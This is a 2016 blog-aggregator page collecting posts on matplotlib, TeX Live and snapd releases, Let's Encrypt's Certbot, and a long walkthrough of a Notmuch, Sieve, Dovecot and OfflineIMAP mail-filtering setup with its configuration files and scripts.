Analyzing Tweets with Pandas and Matplotlib

Python has a variety of visualization libraries, including seaborn, networkx, and vispy. Most Python visualization libraries are based wholly or partially on matplotlib, which often makes it the first resort for making simple plots, and the last resort for making plots too complex to create in other libraries.

In this matplotlib tutorial, we’ll cover the basics of the library, and walk through making some intermediate visualizations.

We’ll be working with a dataset of approximately 240,000 tweets about Hillary Clinton, Donald Trump, and Bernie Sanders, all current candidates for president of the United States.

The data was pulled from the Twitter Streaming API, and the csv of all 240,000 tweets can be downloaded here. If you want to scrape more data yourself, you can look here for the scraper code.

Exploring tweets with Pandas

Before we get started with plotting, let’s load in the data and do some basic exploration. We can use Pandas, a Python library for data analysis, to help us with this. In the below code, we’ll:

  • Import the Pandas library.
  • Read tweets.csv into a Pandas DataFrame.
  • Print the first...

by Planet Python at 2016-05-13 01:48

jwz

Long Live the New Flesh - jwz

I'm glad to see PETA finally doing something worthwhile by giving us the body-horror that Cronenberg has been slacking on!

by jwz at 2016-05-13 01:45

Planet Debian

Norbert Preining: TeX Live 2016 (pretest) hits Debian/unstable - Planet Debian

The sources of TeX Live binaries are now (hopefully) frozen, and barring unpleasant surprises, these will be code going into the final release (one fix for luatex is coming, though). Thus, I thought it is time to upload TeX Live 2016 packages to Debian/unstable to expose them to a wider testing area – packages in experimental receive hardly any testing.

texlive-2016-debian-pretest

The biggest changes are with Luatex, where APIs were changed fundamentally and practically each package using luatex specific code needs to be adjusted. Most of the package authors have already uploaded fixed versions to CTAN and thus to TeX Live, but some are surely still open. I have taken the step to provide driver files for pgf and pgfplots to support pgf with luatex (as I need it myself).

One more thing to be mentioned is that the binaries finally bring support for reproducible builds by supporting the SOURCE_DATE_EPOCH environment variable.

Please send bug reports, suggestions, and improvements (patches welcome!) to improve the quality of the packages. In particular, lintian complains a lot about various man page problems. If someone wants to go through all that it would help a lot. Details on request.

Other than that, many packages have been updated or added since the last Debian packages, here are the incomplete lists (I had accidentally deleted the tlmgr.log file at some point):

new: acmart, chivo, coloring, dvisvgm-def, langsci, makebase, pbibtex-base, platex, ptex-base, ptex-fonts, rosario, uplatex, uptex-base, uptex-fonts.

updated: achemso, acro, arabluatex, arydshln, asymptote, babel-french, biblatex-ieee, bidi, bookcover, booktabs, bxjscls, chemformula, chemmacros, cslatex, csplain, cstex, dtk, dvips, epspdf, fibeamer, footnotehyper, glossaries, glossaries-extra, gobble, graphics, gregoriotex, hyperref, hyperxmp, jadetex, jslectureplanner, koma-script, kpathsea, latex-bin, latexmk, lollipop, luaotfload, luatex, luatexja, luatexko, mathastext, mcf2graph, mex, microtype, msu-thesis, m-tx, oberdiek, pdftex, pdfx, pgf, pgfplots, platex, pmx, pst-cie, pst-func, pst-ovl, pst-plot, ptex, ptex-fonts, reledmac, shdoc, substances, tasks, tetex, tools, uantwerpendocs, ucharclasses, uplatex, uptex, uptex-fonts, velthuis, xassoccnt, xcolor, xepersian, xetex, xgreek, xmltex.

Enjoy.

by Norbert Preining at 2016-05-13 01:22

May 12, 2016

Planet Ubuntu

Zygmunt Krynicki: snapd updated to 2.0.3 - Planet Ubuntu

Ubuntu 16.04 has just been updated with a new release of snapd (2.0.3)

Our release manager, Michael Vogt, has prepared and pushed this release into the Ubuntu archive. You can look at the associated milestone sru-1 on Launchpad for more details.

Work is already under way on sru-2

You can find the changelog below.

   * New upstream micro release:
- integration-tests, debian/tests: add unity snap autopkg test
- snappy: introduce first feature flag for assumes: common-data-dir
- timeout,snap: add YAML unmarshal function for timeout.Timeout
- many: go into state.Retry state when unmounting a snap fails.
(LP: #1571721, #1575399)
- daemon,client,cmd/snap: improve output after snap
install/refresh/remove (LP: #1574830)
- integration-tests, debian/tests: add test for home interface
- interfaces,overlord: support unversioned data
- interfaces/builtin: improve the bluez interface
- cmd: don't include the unit tests when building with go test -c
for integration tests
- integration-tests: teach some new trick to the fake store,
reenable the app refresh test
- many: move with some simplifications test snap building to
snap/snaptest
- asserts: define type for revision related errors
- snap/snaptest,daemon,overlord/ifacestate,overlord/snapstate: unify
mocking snaps behind MockSnap
- snappy: fix openSnapFile's handling of sideInfo
- daemon: improve snap sideload form handling
- snap: add short and long description to the man-page
(LP: #1570280)
- snappy: remove unused SetProperty
- snappy: use more accurate test data
- integration-tests: add a integration test about remove removing
all revisions
- overlord/snapstate: make "snap remove" remove all revisions of a
snap (LP: #1571710)
- integration-tests: re-enable a bunch of integration tests
- snappy: remove unused dbus code
- overlord/ifacestate: fix setup-profiles to use new snap revision
for setup (LP: #1572463)
- integration-tests: add regression test for auth bug LP:#1571491
- client, snap: remove obsolete TypeCore which was used in the old
SystemImage days
- integration-tests: add apparmor test
- cmd: don't perform type assertion when we know error to be nil
- client: list correct snap types
- intefaces/builtin: allow getsockname on connected x11 plugs
(LP: #1574526)
- daemon,overlord/snapstate: read name out of sideloaded snap early,
improved change summary
- overlord: keep tasks unlinked from a change hidden, prune them
- integration-tests: snap list on fresh boot is good again
- integration-tests: add partial term to the find test
- integration-tests: changed default release to 16
- integration-tests: add regression test for snaps not present after
reboot
- integration-tests: network interface
- integration-tests: add proxy related environment variables to
snapd env file
- README.md: snappy => snap
- etc: trivial typo fix (LP:#1569892)
- debian: remove unneeded /var/lib/snapd/apparmor/additional
directory (LP: #1569577)

by Zygmunt Krynicki (noreply@blogger.com) at 2016-05-12 23:47

Planet Python

Anarcat: Notmuch, offlineimap and Sieve setup - Planet Python

I've been using Notmuch since about 2011, switching away from Mutt to deal with the monstrous amount of emails I was, and still am dealing with on the computer. I have contributed a few patches and configs on the Notmuch mailing list, but basically, I have given up on merging patches, and instead have a custom config in Emacs that extend it the way I want. In the last 5 years, Notmuch has progressed significantly, so I haven't found the need to patch it or make sweeping changes.

The huge INBOX of death

The one thing that is problematic with my use of Notmuch is that I end up with a ridiculously large INBOX folder. Before the cleanup I did this morning, I had over 10k emails in there, out of about 200k emails overall.

Since I mostly work from my laptop these days, the Notmuch tags are only on the laptop, and not propagated to the server. This makes accessing the mail spool directly, from webmail or simply through a local client (say Mutt) on the server, really inconvenient, because it has to load a very large spool of mail, which is very slow in Mutt. Even worse, a bunch of mail that was archived in Notmuch shows up in the spool because it's just removed tags in Notmuch: the mails are still in the inbox, even though they are marked as read.

So I was hoping that Notmuch would help me deal with the giant inbox of death problem, but in fact, when I don't use Notmuch, it actually makes the problem worse. Today, I did a bunch of improvements to my setup to fix that.

The first thing I did was to kill procmail, which I was surprised to discover has been dead for over a decade. I switched over to Sieve for filtering, having already switched to Dovecot a while back on the server. I tried to use the procmail2sieve.pl conversion tool but it didn't work very well, so I basically rewrote the whole file. Since I was mostly using Notmuch for filtering, there wasn't much left to convert.

Sieve filtering

But this is where things got interesting: Sieve is so simpler to use and more intuitive that I started doing more interesting stuff in bridging the filtering system (Sieve) with the tagging system (Notmuch). Basically, I use Sieve to split large chunks of emails off my main inbox, to try to remove as much spam, bulk email, notifications and mailing lists as possible from the larger flow of emails. Then Notmuch comes in and does some fine-tuning, assigning tags to specific mailing lists or topics, and being generally the awesome search engine that I use on a daily basis.

Dovecot and Postfix configs

For all of this to work, I had to tweak my mail servers to talk sieve. First, I enabled sieve in Dovecot:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -44,5 +44,5 @@

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).
-  #mail_plugins = $mail_plugins
+  mail_plugins = $mail_plugins sieve
 }

Then I had to switch from procmail to dovecot for local delivery, that was easy, in Postfix's perennial main.cf:

#mailbox_command = /usr/bin/procmail -a "$EXTENSION"
mailbox_command = /usr/lib/dovecot/dovecot-lda -a "$RECIPIENT"

Note that dovecot takes the full recipient as an argument, not just the extension. That's normal. It's clever, it knows that kind of stuff.

One last tweak I did was to enable automatic mailbox creation and subscription, so that the automatic extension filtering (below) can create mailboxes on the fly:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -37,10 +37,10 @@
 #lda_original_recipient_header =

 # Should saving a mail to a nonexistent mailbox automatically create it?
-#lda_mailbox_autocreate = no
+lda_mailbox_autocreate = yes

 # Should automatically created mailboxes be also automatically subscribed?
-#lda_mailbox_autosubscribe = no
+lda_mailbox_autosubscribe = yes

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).

Sieve rules

Then I had to create a Sieve ruleset. That thing lives in ~/.dovecot.sieve, since I'm running Dovecot. Your provider may accept an arbitrary ruleset like this, or you may need to go through a web interface, or who knows. I'm assuming you're running Dovecot and have a shell from now on.

The first part of the file is simply to enable a bunch of extensions, as needed:

# Sieve Filters
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples
# https://tools.ietf.org/html/rfc5228
require "fileinto";
require "envelope";
require "variables";
require "subaddress";
require "regex";
require "vacation";
require "vnd.dovecot.debug";

Some of those are not used yet, for example I haven't tested the vacation module yet, but I have good hopes that I can use it as a way to announce a special "urgent" mailbox while I'm traveling. The rationale is to have a distinct mailbox for urgent messages that is announced in the autoreply, that hopefully won't be parsable by bots.

Spam filtering

Then I filter spam using this fairly standard expression:

########################################################################
# spam 
# possible improvement, server-side:
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Filtering_using_the_spamtest_and_virustest_extensions
if header :contains "X-Spam-Flag" "YES" {
  fileinto "junk";
  stop;
} elsif header :contains "X-Spam-Level" "***" {
  fileinto "greyspam";
  stop;
}

This puts stuff into the junk or greyspam folder, based on the severity. I am very aggressive with spam: stuff often ends up in the greyspam folder, which I need to check from time to time, but it beats having too much spam in my inbox.

Mailing lists

Mailing lists are generally put into a lists folder, with some mailing lists getting their own folder:

########################################################################
# lists
# converted from procmail
if header :contains "subject" "FreshPorts" {
    fileinto "freshports";
} elsif header :contains "List-Id" "alternc.org" {
    fileinto "alternc";
} elsif header :contains "List-Id" "koumbit.org" {
    fileinto "koumbit";
} elsif header :contains ["to", "cc"] ["lists.debian.org",
                                       "anarcat@debian.org"] {
    fileinto "debian";
# Debian BTS
} elsif exists "X-Debian-PR-Message" {
    fileinto "debian";
# default lists fallback
} elsif exists "List-Id" {
    fileinto "lists";
}

The idea here is that I can safely subscribe to lists without polluting my mailbox by default. Further processing is done in Notmuch.

Extension matching

I also use the magic +extension tag on emails. If you send email to, say, foo+extension@example.com then the emails end up in the foo folder. This is done with the help of the following recipe:

########################################################################
# wildcard +extension
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Plus_Addressed_mail_filtering
if envelope :matches :detail "to" "*" {
  # Save name in ${name} in all lowercase except for the first letter.
  # Joe, joe, jOe thus all become 'Joe'.
  set :lower "name" "${1}";
  fileinto "${name}";
  #debug_log "filed into mailbox ${name} because of extension";
  stop;
}

This is actually very effective: any time I register to a service, I try as much as possible to add a +extension that describe the service. Of course, spammers and marketers (it's the same really) are free to drop the extension and I suspect a lot of them do, but it helps with honest providers and this actually sorts a lot of stuff out of my inbox into topically-defined folders.

It is also a security issue: someone could flood my filesystem with tons of mail folders, which would cripple the IMAP server and eat all the inodes, 4 times faster than just sending emails. But I guess I'll cross that bridge when I get there: anyone can flood my address and I have other mechanisms to deal with this.

The trick is to then assign tags to all folders so that they appear in the Notmuch-emacs welcome view:

echo tagging folders
for folder in $(ls -ad $HOME/Maildir/${PREFIX}*/ | egrep -v "Maildir/${PREFIX}(feeds.*|Sent.*|INBOX/|INBOX/Sent)\$"); do
    tag=$(echo $folder | sed 's#/$##;s#^.*/##')
    notmuch tag +$tag -inbox tag:inbox and not tag:$tag and folder:${PREFIX}$tag
done

This is part of my notmuch-tag script that includes a lot more fine-tuned filtering, detailed below.

Automated reports filtering

Another thing I get a lot of is machine-generated "spam". Well, it's not commercial spam, but it's a bunch of Nagios, cron jobs, and god knows what software thinks it's important to send me emails every day. I get a lot less of those these days since I'm off work at Koumbit, but still, those can be useful for others as well:

if anyof (exists "X-Cron-Env",
          header :contains ["subject"] ["security run output",
                                        "monthly run output",
                                        "daily run output",
                                        "weekly run output",
                                        "Debian Package Updates",
                                        "Debian package update",
                                        "daily mail stats",
                                        "Anacron job",
                                        "nagios",
                                        "changes report",
                                        "run output",
                                        "[Systraq]",
                                        "Undelivered mail",
                                        "Postfix SMTP server: errors from",
                                        "backupninja",
                                        "DenyHosts report",
                                        "Debian security status",
                                        "apt-listchanges"
                                        ],
           header :contains "Auto-Submitted" "auto-generated",
           envelope :contains "from" ["nagios@",
                                      "logcheck@"])
    {
    fileinto "rapports";
}
# imported from procmail
elsif header :comparator "i;octet" :contains "Subject" "Cron" {
  if header :regex :comparator "i;octet"  "From" ".*root@" {
        fileinto "rapports";
  }
}
elsif header :comparator "i;octet" :contains "To" "root@" {
  if header :regex :comparator "i;octet"  "Subject" "\\*\\*\\* SECURITY" {
        fileinto "rapports";
  }
}
elsif header :contains "Precedence" "bulk" {
    fileinto "bulk";
}

Refiltering emails

Of course, after all this I still had thousands of emails in my inbox, because the sieve filters apply only on new emails. The beauty of Sieve support in Dovecot is that there is a neat sieve-filter command that can reprocess an existing mailbox. That was a lifesaver. To run a specific sieve filter on a mailbox, I simply run:

sieve-filter .dovecot.sieve INBOX 2>&1 | less

Well, this doesn't do anything. To really execute the filters, you need the -e flags, and to write to the INBOX for real, you need the -w flag as well, so the real run looks something more like this:

sieve-filter -e -W -v .dovecot.sieve INBOX > refilter.log 2>&1

The funky output redirects are necessary because this outputs a lot of crap. Also note that, unfortunately, the fake run output differs from the real run and is actually more verbose, which makes it really less useful than it could be.

Archival

I also usually archive my mails every year, rotating my mailbox into an Archive.YYYY directory. For example, now all mails from 2015 are archived in a Archive.2015 directory. I used to do this with Mutt tagging and it was a little slow and error-prone. Now, i simply have this Sieve script:

require ["variables","date","fileinto","mailbox", "relational"];

# Extract date info
if currentdate :matches "year" "*" { set "year" "${1}"; }

if date :value "lt" :originalzone "date" "year" "${year}" {
  if date :matches "received" "year" "*" {
    # Archive Dovecot mailing list items by year and month.
    # Create folder when it does not exist.
    fileinto :create "Archive.${1}";
  }
}

I went from 15613 to 1040 emails in my real inbox with this process (including refiltering with the default filters as well).

Notmuch configuration

My Notmuch configuration is a in three parts: I have small settings in ~/.notmuch-config. The gist of it is:

[new]
tags=unread;inbox;
ignore=

#[maildir]
# synchronize_flags=true
# tentative patch that was refused upstream
# http://mid.gmane.org/1310874973-28437-1-git-send-email-anarcat@koumbit.org
#reckless_trash=true

[search]
exclude_tags=deleted;spam;

I omitted the fairly trivial [user] section for privacy reasons and [database] for declutter.

Then I have a notmuch-tag script symlinked into ~/Maildir/.notmuch/hooks/post-new. It does way too much stuff to describe in details here, but here are a few snippets:

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

This sets a variable that makes the script work on my laptop (angela), where mailboxes are in Maildir/Anarcat/foo or the server, where mailboxes are in Maildir/.foo.

I also have special rules to tag my RSS feeds, which are generated by feed2imap, which is documented shortly below:

echo tagging feeds
( cd $HOME/Maildir/ && for feed in ${PREFIX}feeds.*; do
    name=$(echo $feed | sed "s#${PREFIX}feeds\\.##")
    notmuch tag +feeds +$name -inbox folder:$feed and not tag:feeds
done )

Another example that would be useful is how to tag mailing lists, for example, this removes the inbox tag and adds the notmuch tags to emails from the notmuch mailing list.

notmuch tag +lists +notmuch      -inbox tag:inbox and "to:notmuch@notmuchmail.org"

Finally, I have a bunch of special keybindings in ~/.emacs.d/notmuch-config.el:

;; autocompletion
(eval-after-load "notmuch-address"
  '(progn
     (notmuch-address-message-insinuate)))

; use fortune for signature, config is in custom
(add-hook 'message-setup-hook 'fortune-to-signature)
; don't remember what that is
(add-hook 'notmuch-show-hook 'visual-line-mode)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; keymappings
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(define-key notmuch-show-mode-map "S"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("+spam" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "S"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+spam" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "H"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("-spam"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "H"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-spam") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "l" 
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "u"
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-deleted") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "d"
  (lambda (&optional beg end)
    "delete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+deleted" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "d"
  (lambda ()
    "delete current message and advance"
    (interactive)
    (notmuch-show-tag '("+deleted" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

;; https://notmuchmail.org/emacstips/#index17h2
(define-key notmuch-show-mode-map "b"
  (lambda (&optional address)
    "Bounce the current message."
    (interactive "sBounce To: ")
    (notmuch-show-view-raw-message)
    (message-resend address)
    (kill-buffer)))

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; my custom notmuch functions
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(defun anarcat/notmuch-search-next-thread ()
  "Skip to next message from region or point

This is necessary because notmuch-search-next-thread just starts
from point, whereas it seems to me more logical to start from the
end of the region."
  ;; move line before the end of region if there is one
  (unless (= beg end)
    (goto-char (- end 1)))
  (notmuch-search-next-thread))

;; Linking to notmuch messages from org-mode
;; https://notmuchmail.org/emacstips/#index23h2
(require 'org-notmuch nil t)

(message "anarcat's custom notmuch config loaded")

This is way too long: in my opinion, a bunch of that stuff should be factored in upstream, but some features have been hard to get in. For example, Notmuch is really hesitant in marking emails as deleted. The community is also very strict about having unit tests for everything, which makes writing new patches a significant challenge for a newcomer, which will often need to be familiar with both Elisp and C. So for now I just have those configs that I carry around.

Emails marked as deleted or spam are processed with the following script named notmuch-purge which I symlink to ~/Maildir/.notmuch/hooks/pre-new:

#!/bin/sh

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

echo moving tagged spam to the junk folder
notmuch search --output=files tag:spam \
        and not folder:${PREFIX}junk \
        and not folder:${PREFIX}greyspam \
        and not folder:Koumbit/INBOX \
        and not path:Koumbit/** \
    | while read file; do
          mv "$file" "$HOME/Maildir/${PREFIX}junk/cur"
      done

echo unconditionnally deleting deleted mails
notmuch search --output=files tag:deleted | xargs -r rm

Oh, and there's also customization for Notmuch:

;; -*- mode: emacs-lisp; auto-recompile: t; -*-
(custom-set-variables
 ;; from https://anarc.at/sigs.fortune
 '(fortune-file "/home/anarcat/.mutt/sigs.fortune")
 '(message-send-hook (quote (notmuch-message-mark-replied)))
 '(notmuch-address-command "notmuch-address")
 '(notmuch-always-prompt-for-sender t)
 '(notmuch-crypto-process-mime t)
 '(notmuch-fcc-dirs
   (quote
    ((".*@koumbit.org" . "Koumbit/INBOX.Sent")
     (".*" . "Anarcat/Sent"))))
 '(notmuch-hello-tag-list-make-query "tag:unread")
 '(notmuch-message-headers (quote ("Subject" "To" "Cc" "Bcc" "Date" "Reply-To")))
 '(notmuch-saved-searches
   (quote
    ((:name "inbox" :query "tag:inbox and not tag:koumbit and not tag:rt")
     (:name "unread inbox" :query "tag:inbox and tag:unread")
     (:name "unread" :query "tag:unred")
     (:name "freshports" :query "tag:freshports and tag:unread")
     (:name "rapports" :query "tag:rapports and tag:unread")
     (:name "sent" :query "tag:sent")
     (:name "drafts" :query "tag:draft"))))
 '(notmuch-search-line-faces
   (quote
    (("deleted" :foreground "red")
     ("unread" :weight bold)
     ("flagged" :foreground "blue"))))/
 '(notmuch-search-oldest-first nil)
 '(notmuch-show-all-multipart/alternative-parts nil)
 '(notmuch-show-all-tags-list t)
 '(notmuch-show-insert-text/plain-hook
   (quote
    (notmuch-wash-convert-inline-patch-to-part notmuch-wash-tidy-citations notmuch-wash-elide-blank-lines notmuch-wash-excerpt-citations)))
 )

I think that covers it.

Offlineimap

So of course the above works well on the server directly, but how do run Notmuch on a remote machine that doesn't have access to the mail spool directly? This is where OfflineIMAP comes in. It allows me to incrementally synchronize a local Maildir folder hierarchy with a a remote IMAP server. I am assuming you already have an IMAP server configured, since you already configured Sieve above.

Note that other synchronization tools exist. The other popular one is isync but I had trouble migrating to it (see courriels for details) so for now I am sticking with OfflineIMAP.

The configuration is fairly simple:

[general]
accounts = Anarcat
ui = Blinkenlights
maxsyncaccounts = 3

[Account Anarcat]
localrepository = LocalAnarcat
remoterepository = RemoteAnarcat
# refresh all mailboxes every 10 minutes
autorefresh = 10
# run notmuch after refresh
postsynchook = notmuch new
# sync only mailboxes that changed
quick = -1
## possible optimisation: ignore mails older than a year
#maxage = 365

# local mailbox location
[Repository LocalAnarcat]
type = Maildir
localfolders = ~/Maildir/Anarcat/

# remote IMAP server
[Repository RemoteAnarcat]
type = IMAP
remoteuser = anarcat
remotehost = anarc.at
ssl = yes
# without this, the cert is not verified (!)
sslcacertfile = /etc/ssl/certs/DST_Root_CA_X3.pem
# do not sync archives
folderfilter = lambda foldername: not re.search('(Sent\.20[01][0-9]\..*)', foldername) and not re.search('(Archive.*)', foldername)
# and only subscribed folders
subscribedonly = yes
# don't reconnect all the time
holdconnectionopen = yes
# get mails from INBOX immediately, doesn't trigger postsynchook
idlefolders = ['INBOX']

Critical parts are:

  • postsynchook: obviously, we want to run notmuch after fetching mail
  • idlefolders: receives emails immediately without waiting for the longer autorefresh delay, which means that most mailboxes don't see new emails until 10 minutes in the worst case. unfortunately, doesn't run the postsynchook so I need to hit G in Emacs to see new mail
  • quick=-1, subscribedonly, holdconnectionopen: makes most runs much, much faster as it skips unchanged or unsubscribed folders and keeps the connection to the server

The other settings should be self-explanatory.

RSS feeds

I gave up on RSS readers, or more precisely, I merged RSS feeds and email. The first time I heard of this, it sounded like a horrible idea, because it means yet more emails! But with proper filtering, it's actually a really nice way to process emails, since it leverages the distributed nature of email.

For this I use a fairly standard feed2imap, although I do not deliver to an IMAP server, but straight to a local Maildir. The configuration looks like this:

---
include-images: true
target-refix: &target "maildir:///home/anarcat/Maildir/.feeds."
feeds:
- name: Planet Debian
  url: http://planet.debian.org/rss20.xml
  target: [ *target, 'debian-planet' ]

I have obviously more feeds, the above is just and example. This will deliver the feeds as emails in one mailbox per feed, in ~/Maildir/.feeds.debian-planet, in the above example.

Troubleshooting

You will fail at writing the sieve filters correctly, and mail will (hopefully?) fall through to your regular mailbox. Syslog will tell you things fail, as expected, and details are in your .dovecot.sieve.log file in your home directory.

I also enabled debugging on the Sieve module

--- a/dovecot/conf.d/90-sieve.conf
+++ b/dovecot/conf.d/90-sieve.conf
@@ -51,6 +51,7 @@ plugin {
        # deprecated imapflags extension in addition to all extensions were already
   # enabled by default.
   #sieve_extensions = +notify +imapflags
+  sieve_extensions = +vnd.dovecot.debug

   # Which Sieve language extensions are ONLY available in global scripts. This
   # can be used to restrict the use of certain Sieve extensions to administrator

This allowed me to use debug_log function in the rulesets to output stuff directly to the logfile.

Further improvements

Of course, this is all done on the commandline, but that is somewhat expected if you are already running Notmuch. Of course, it would be much easier to edit those filters through a GUI. Roundcube has a nice Sieve plugin, and Thunderbird also has such a plugin as well. Since Sieve is a standard, there's a bunch of clients available. All those need you to setup some sort of thing on the server, which I didn't bother doing yet.

And of course, a key improvement would be to have Notmuch synchronize its state better with the mailboxes directly, instead of having the notmuch-purge hack above. Dovecot and Maildir formats support up to 26 flags, and there were discussions about using those flags to synchronize with notmuch tags so that multiple notmuch clients can see the same tags on different machines transparently.

This, however, won't make Notmuch work on my phone or webmail or any other more generic client: for that, Sieve rules are still very useful.

I still don't have webmail setup at all: so to read email, I need an actual client, which is currently my phone, which means I need to have Wifi access to read email. "Internet Cafés" or "this guy's computer" won't work as well, although I can always use ssh to login straight to the server and read mails with Mutt.

I am also considering using X509 client certificates to authenticate to the mail server without a passphrase. This involves configuring Postfix, which seems simple enough. Dovecot's configuration seems a little more involved and less well documented. It seems that both [OfflimeIMAP][] and K-9 mail support client-side certs. OfflineIMAP prompts me for the password so it doesn't get leaked anywhere. I am a little concerned about building yet another CA, but I guess it would not be so hard...

The server side of things needs more documenting, particularly the spam filters. This is currently spread around this wiki, mostly in configuration.

Security considerations

The whole purpose of this was to make it easier to read my mail on other devices. This introduces a new vulnerability: someone may steal that device or compromise it to read my mail, impersonate me on different services and even get a shell on the remote server.

Thanks to the two-factor authentication I setup on the server, I feel a little more confident that just getting the passphrase to the mail account isn't sufficient anymore in leveraging shell access. It also allows me to login with ssh on the server without trusting the machine too much, although that only goes so far... Of course, sudo is then out of the question and I must assume that everything I see is also seen by the attacker, which can also inject keystrokes and do all sorts of nasty things.

Since I also connected my email account on my phone, someone could steal the phone and start impersonating me. The mitigation here is that there is a PIN for the screen lock, and the phone is encrypted. Encryption isn't so great when the passphrase is a PIN, but I'm working on having a better key that is required on reboot, and the phone shuts down after 5 failed attempts. This is documented in my phone setup.

Client-side X509 certificates further mitigates those kind of compromises, as the X509 certificate won't give shell access.

Basically, if the phone is lost, all hell breaks loose: I need to change the email password (or revoke the certificate), as I assume the account is about to be compromised. I do not trust Android security to give me protection indefinitely. In fact, one could argue that the phone is already compromised and putting the password there already enabled a possible state-sponsored attacker to hijack my email address. This is why I have an OpenPGP key on my laptop to authenticate myself for critical operations like code signatures.

The risk of identity theft from the state is, after all, a tautology: the state is the primary owner of identities, some could say by definition. So if a state-sponsored attacker would like to masquerade as me, they could simply issue a passport under my name and join a OpenPGP key signing party, and we'd have other problems to deal with, namely, proper infiltration counter-measures and counter-snitching.

by Planet Python at 2016-05-12 23:29

The Endeavour

Tonal prominence in a leaf blower - The Endeavour

leaf blower

This afternoon I was working on a project involving tonal prominence. I stepped away from the computer to think and was interrupted by the sound of a leaf blower. I was annoyed for a second, then I thought “Hey, a leaf blower!” and went out to record it. A leaf blower is a great example of a broad spectrum noise with strong tonal components. Lawn maintenance men think you’re kinda crazy when you say you want to record the noise of their equipment.

The tuner app on my phone identified the sound as an A3, the A below middle C, or 220 Hz. Apparently leaf blowers are tenors.

Here’s a short audio clip:

 

And here’s what the spectrum looks like. The dashed grey vertical lines are at multiples of 55 Hz.

leaf blower audio spectrum

The peaks are perfectly spaced at multiples of the fundamental frequency of 55 Hz, A1 in scientific pitch notation. This even spacing of peaks is the fingerprint of a definite tone. There’s also a lot of random fluctuation between peaks. That’s the finger print of noise. So together we hear a pitch and noise.

When using the tone-to-noise ratio algorithm from the ECMA-74, only the spike at 110 Hz is prominent. A limitation of that approach is that it only considers single tones, not how well multiple tones line up in a harmonic sequence.

Related posts:

 

by John at 2016-05-12 22:35

LWN.net

Announcing Certbot: EFF's Client for Let's Encrypt - LWN.net

The Electronic Frontier Foundation (EFF) has announced a new name and web site for the Let's Encrypt client. The Let's Encrypt project is a free certificate authority for TLS certificates that enable HTTPS for the web. The client, now called "Certbot", uses Automatic Certificate Management Environment (ACME) to talk to the Let's Encrypt CA, though it will no longer be the "official" client and there are other ACME clients that can be used. "Along with the rename, we've also launched a brand new website for Certbot, found at https://certbot.eff.org. The site includes frequently asked questions as well as links to how you can learn more and help support the project, but by far the biggest feature of the website is an interactive instruction tool. To get the specific commands you need to get Certbot up and running, just input your operating system and webserver. No more searching through pages and pages of documentation or Google search results! While a new name has the potential for creating technical issues, the Certbot team has worked hard to make this transition as seamless as possible. Packages installed from PyPI, letsencrypt-auto, and third party plugins should all continue to work and receive updates without modification. We expect OS packages to begin using the Certbot name in the next few weeks as well. On many systems, the current client packages will automatically transition to Certbot while continuing to support the letsencrypt command so you won't have to edit any scripts you're currently using."

by jake at 2016-05-12 22:29

Planet Ubuntu

Nicholas Skaggs: Getting your daily dose of juju - Planet Ubuntu

One of the first pain points I've been attempting to help smooth out was how Juju is packaged and consumed. The Juju QA Team have put together a new daily ppa you can use, dubbed the Juju Daily ppa. It contains the latest blessed builds from CI testing. Installing this ppa and upgrading regularly allows you to stay in sync with the absolute latest version of Juju that passes our CI testing.

Naturally, this ppa is intended for those who like living on the edge, so it's not recommended for production use. If you find bugs, we'd love to hear about them!

To add the ppa, you will need to add ppa:juju/daily to your software sources.

sudo add-apt-repository ppa:juju/daily

Do be aware that adding this ppa will upgrade any version of Juju you may have installed. Also note this ppa contains builds without published streams, so you will need to generate or acquire streams on your own. For most users, this means you should pass --upload-tools during the bootstrap process. However you may also pass the agent-metadata-url and agent-stream as config options. See the ppa description and simplestreams documentation for more details.

Finally, should you wish to revert to a stable version of Juju, you can use the ppa-purge tool to remove the daily ppa and the installed version of Juju.

I'd love to hear your feedback, and encourage you to give it a try.

by Nicholas Skaggs (noreply@blogger.com) at 2016-05-12 20:36

PHD Comics

05/11/16 PHD comic: 'Final Draft' - PHD Comics

Piled Higher & Deeper by Jorge Cham
www.phdcomics.com
Click on the title below to read the comic
